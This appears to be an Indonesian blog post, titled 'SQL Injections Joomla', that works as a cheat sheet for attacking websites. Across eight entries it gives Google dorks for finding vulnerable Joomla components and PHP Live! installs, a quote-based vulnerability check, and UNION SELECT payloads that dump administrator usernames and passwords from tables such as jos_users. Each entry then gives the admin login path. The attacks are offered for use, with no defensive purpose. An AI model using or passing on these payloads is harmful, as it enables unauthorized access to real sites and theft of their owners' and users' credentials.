SQL Injections Joomla




1. Google dork = allinurl:option=com_user

Cek Vuln
site/index.php?option=com_user&view=reset&layout=confirm

Cek UID n Pass Admin
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=1
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=2
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=3

SAMPAI MUNCUL TABEL INFORMASI

Login
Site/administrator

2. Google dork = allinurl:mod.php?mod=publisher 

Cek Vuln
site/mod.php?mod=publisher&op=viewcat&cid=2'

Cek UID n Pass Admin
site/mod.php?mod=publisher&op=viewcat&cid=-2+union+all+select+1,group_concat(aid,0x3a,name,0x3a,pwd),3+from+authors--

Login
site/admin.php

3. Google dork = inurl:com_gameserver 

 Cek Vuln
Site/index.php?option=com_gameserver&view=gamepanel&id=3'

Cek UID n Pass Admin
site/index.php?option=com_gameserver&view=gamepanel&id=3+union+select+1,2,group_concat(username,char(58),password),4+from+jos_users-–

Cek Login
site/path/path/path/admin
4. Google dork = inurl:com_digifolio

Cek Vuln
site/index.php?option=com_digifolio&view=project&id=2'

Cek UID n Pass Admin
site/index.php?option=com_digifolio&view=project&id=-2+union+all+select+1,group_concat(username,char(58),password),3+from+jos_users-–

Cek Login
site/admin

5. Google dork = inurl:com_siirler

Cek Vuln
site/index.php?option=com_siirler&task=sdetay&sid=
3'

Cek UID n Pass Admin
site/index.php?option=com_siirler&task=sdetay&sid=
-3+union+all+select+1,2,concat(username,char(58),password),4+from+jos_users–-

Cek Login
site/admin

6. Google dork = Powered by PHP Live! v3.3


 Cek Vuln
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=2'

Cek UID n Pass Admin
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-2+union++all+select+1,group_concat(login,char(58),password),3,4,5+from+chat_admin–


Cek Login
site/admin

7. Google dork = allinurl:option=com_livechat

Cek Vuln
site/administrator/components/com_livechat/getChat.php?chat=0&last=3'

Cek UID n Pass Admin
site/administrator/components/com_livechat/getChat.php?chat=0&last=-3+union+all+select+1,2,unhex(hex(concat(username,0×3a,password))),4+from+"masih jadi misteri!!"

8. Google dork = allinurl:com_idoblog

Cek Vuln
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62'

Cek UID n Pass Admin
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0×3a,username,password)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–

Cek Login
site/administrator

site/index.php?option=com_rsgallery2&Itemid=&page=vote&catid= (SQL Injection Blind)

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel